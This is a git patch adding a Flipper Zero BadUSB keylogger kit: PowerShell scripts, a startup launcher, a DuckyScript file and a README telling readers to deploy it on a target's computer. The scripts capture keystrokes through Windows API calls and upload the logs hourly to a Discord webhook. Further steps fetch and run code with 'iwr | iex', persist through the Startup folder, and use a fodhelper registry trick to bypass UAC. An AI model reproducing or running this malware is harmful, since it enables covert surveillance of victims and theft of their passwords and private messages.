From 6eff5a5fe6a6c0ee493d013f917d0736d02484d1 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 3 Jan 2023 23:10:53 -0600 Subject: [PATCH] Add files via upload --- Payloads/Flip-Keylogger/-keys.ps1 | 69 +++++++++ Payloads/Flip-Keylogger/-logs.ps1 | 99 +++++++++++++ Payloads/Flip-Keylogger/-p.cmd | 4 + Payloads/Flip-Keylogger/README.md | 141 +++++++++++++++++++ Payloads/Flip-Keylogger/exit.ps1 | 43 ++++++ Payloads/Flip-Keylogger/keylogger - Copy.ps1 | 19 +++ Payloads/Flip-Keylogger/keylogger.ps1 | 7 + Payloads/Flip-Keylogger/keylogger.txt | 25 ++++ Payloads/Flip-Keylogger/s2.ps1 | 8 ++ 9 files changed, 415 insertions(+) create mode 100644 Payloads/Flip-Keylogger/-keys.ps1 create mode 100644 Payloads/Flip-Keylogger/-logs.ps1 create mode 100644 Payloads/Flip-Keylogger/-p.cmd create mode 100644 Payloads/Flip-Keylogger/README.md create mode 100644 Payloads/Flip-Keylogger/exit.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger - Copy.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger.ps1 create mode 100644 Payloads/Flip-Keylogger/keylogger.txt create mode 100644 Payloads/Flip-Keylogger/s2.ps1 diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1 new file mode 100644 index 0000000..d1d0774 --- /dev/null +++ b/Payloads/Flip-Keylogger/-keys.ps1 @@ -0,0 +1,69 @@ +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore + + +function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){ + $signatures = @' + [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] + public static extern short GetAsyncKeyState(int virtualKeyCode); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int GetKeyboardState(byte[] keystate); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int MapVirtualKey(uint uCode, int uMapType); + [DllImport("user32.dll", CharSet=CharSet.Auto)] + public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +'@ + + $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru + + + $null = New-Item -Path $Path -ItemType File -Force + + try + { + Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red + + while ($true) { + Start-Sleep -Milliseconds 40 + $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') + $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') + if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit} + + + for ($ascii = 9; $ascii -le 254; $ascii++) { + + $state = $API::GetAsyncKeyState($ascii) + + + if ($state -eq -32767) { + $null = [console]::CapsLock + + + $virtualKey = $API::MapVirtualKey($ascii, 3) + + + $kbstate = New-Object Byte[] 256 + $checkkbstate = $API::GetKeyboardState($kbstate) + + + $mychar = New-Object -TypeName System.Text.StringBuilder + + $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) + + if ($success) + { + + [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) + } + } + } + } + } + finally + { + + #notepad $Path + } +} + +XXXlog diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1 new file mode 100644 index 0000000..3591751 --- /dev/null +++ b/Payloads/Flip-Keylogger/-logs.ps1 @@ -0,0 +1,99 @@ +# powershell log scheduler +# created by : C0SM0 +# Modified by : Jakoby + +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore + + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +if([String]::IsNullOrWhiteSpace((Get-content "$env:appdata\-locker\log.txt"))){ +# times logs will be sent [keep in military time] +$logTimes = @( + '00:00:00', + '01:00:00', + '02:00:00', + '03:00:00', + '04:00:00', + '05:00:00', + '06:00:00', + '07:00:00', + '08:00:00', + '09:00:00', + '10:00:00', + '11:00:00', + '12:00:00', + '13:00:00', + '14:00:00', + '15:00:00', + '16:00:00', + '17:00:00', + '18:00:00', + '19:00:00', + '20:00:00', + '21:00:00', + '22:00:00', + '23:00:00' +) +} + +else {$logTimes = @( + (Get-content "$env:appdata\-locker\log.txt") +) +} + +# sort the times in chronological order +$logTimes = $logTimes | Sort-Object + +# ensure keylogger runs every day +while ($true) { + + # run keylogger for each trigger time + foreach ($t in $logTimes) + { + # checks if time passed already + if((Get-Date) -lt (Get-Date -Date $t)) + { + # sleeps until next time is reached + while ((Get-Date -Date $t) -gt (Get-Date)) + { + # sleeps + $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') + $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') + if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){exit} + (Get-Date -Date $t) - (Get-Date) | Start-Sleep + } + + # runs keylogger + Upload-Discord -file $Path + echo "" > $Path + + + } + } +} diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd new file mode 100644 index 0000000..1dce41d --- /dev/null +++ b/Payloads/Flip-Keylogger/-p.cmd @@ -0,0 +1,4 @@ +@echo off +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1" +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1" +powershell -ep bypass -w h Start-Process powershell.exe -windowstyle hidden "$env:appdata/-exit.ps1" diff --git a/Payloads/Flip-Keylogger/README.md b/Payloads/Flip-Keylogger/README.md new file mode 100644 index 0000000..0b51049 --- /dev/null +++ b/Payloads/Flip-Keylogger/README.md @@ -0,0 +1,141 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Keylogger + +This is a Powershell based keylogger that exfiltrates the logs to discord + +## Description + +Quickly with just ONE line of code you can deploy a keylogger on your targets computer + +Complete with custom logging times, and self destruct feature + +Just move the `keylogger.txt` file over to your flipper and you are good to go + +## Getting Started + +### Dependencies + +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* 15 seconds later you have their keystrokes being sent to you + +This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you + +* `$dc=''` is the variable where you plug in your discord webhook + +``` +powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" | iex +``` +### ADDITIONAL PARAMETERS + +The payload is set to send the logs collected every hour on the hour + +* You maybe use the `$log` variable to specify a certain time instead (Use this for testing) +* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm + +You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th + +Calling the script with both a `log` time and `killswitch` will look something like this: + +``` +powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex" +``` +### DELETING THE KEYLOGGER + +Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up + +C# + + + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Golang + +
Instagram + 		+ + Jsonnet + +
Discord + 		+ + Jsonnet + +
TikTok +
+
+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ diff --git a/Payloads/Flip-Keylogger/exit.ps1 b/Payloads/Flip-Keylogger/exit.ps1 new file mode 100644 index 0000000..1d05f17 --- /dev/null +++ b/Payloads/Flip-Keylogger/exit.ps1 @@ -0,0 +1,43 @@ +Add-Type -AssemblyName WindowsBase +Add-Type -AssemblyName PresentationCore,PresentationFramework + +$Path="$env:appdata\-locker\$env:UserName-loot.txt" + +$dc = (Get-Content "$env:appdata\-locker\wh.txt" -TotalCount 1) + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc} +} + +while($true){ +$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') +$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'RightCtrl') +if((Get-Content "$env:appdata\-locker\killswitch.txt") -ne $null -and ((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rctrl -and $Lctrl)){ +Upload-Discord -file $Path +sleep 5 +Remove-Item "$env:appdata\-locker" -Recurse -Force; +Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3) +Remove-Item "$env:appdata\-exit.ps1" +exit +} +else{continue} +} diff --git a/Payloads/Flip-Keylogger/keylogger - Copy.ps1 b/Payloads/Flip-Keylogger/keylogger - Copy.ps1 new file mode 100644 index 0000000..3fc34b2 --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger - Copy.ps1 @@ -0,0 +1,19 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; +echo $log > "$env:appdata\-locker\log.txt"; +echo $ks > "$env:appdata\-locker\killswitch.txt"; + +function s1 { + $user = "$env:COMPUTERNAME\$env:USERNAME" + $isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user +if($isAdmin){ + $259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex"; + reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f; + + } + else{ + Break + } +} + +s1 diff --git a/Payloads/Flip-Keylogger/keylogger.ps1 b/Payloads/Flip-Keylogger/keylogger.ps1 new file mode 100644 index 0000000..3caa03e --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger.ps1 @@ -0,0 +1,7 @@ +if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"}; +echo $dc > "$env:appdata\-locker\wh.txt"; +echo $log > "$env:appdata\-locker\log.txt"; +echo $ks > "$env:appdata\-locker\killswitch.txt"; + +irm https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex + diff --git a/Payloads/Flip-Keylogger/keylogger.txt b/Payloads/Flip-Keylogger/keylogger.txt new file mode 100644 index 0000000..a5fa34a --- /dev/null +++ b/Payloads/Flip-Keylogger/keylogger.txt @@ -0,0 +1,25 @@ +REM Title: Keylogger + +REM Author: I am Jakoby + +REM Description: This is a Powershell based keylogger that exfiltrates the logs to discord + +REM Target: Windows 10, 11 + +REM ADDITIONAL PARAMETERS +REM The payload is set to send the logs collected every hour on the hour + +REM You maybe use the $log variable to specify a certain time instead (Use this for testing) +REM ex: $log="09:00 pm" <-- This will send the log every night at 9pm +REM You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date + +REM $ks="12/25/2022 10:00:00 PM" <-- This will make the keylogger self delete at 10pm on December 25th + +REM Calling the script with both a log time and killswitch will look something like this: + +REM $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 PM";iwr "https://jakoby.lol/m2m" | iex + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='';$ks='';iwr 'https://jakoby.lol/m2m' | iex" +ENTER diff --git a/Payloads/Flip-Keylogger/s2.ps1 b/Payloads/Flip-Keylogger/s2.ps1 new file mode 100644 index 0000000..060390a --- /dev/null +++ b/Payloads/Flip-Keylogger/s2.ps1 @@ -0,0 +1,8 @@ +# Add-MpPreference -ExclusionPath $env:appdata/-locker + +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-p.cmd -o "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-keys.ps1 -o "$env:appdata\-locker\-keys.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/-logs.ps1 -o "$env:appdata\-locker\-logs.ps1" +iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/exit.ps1 -o "$env:appdata\-exit.ps1" + +start-process "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"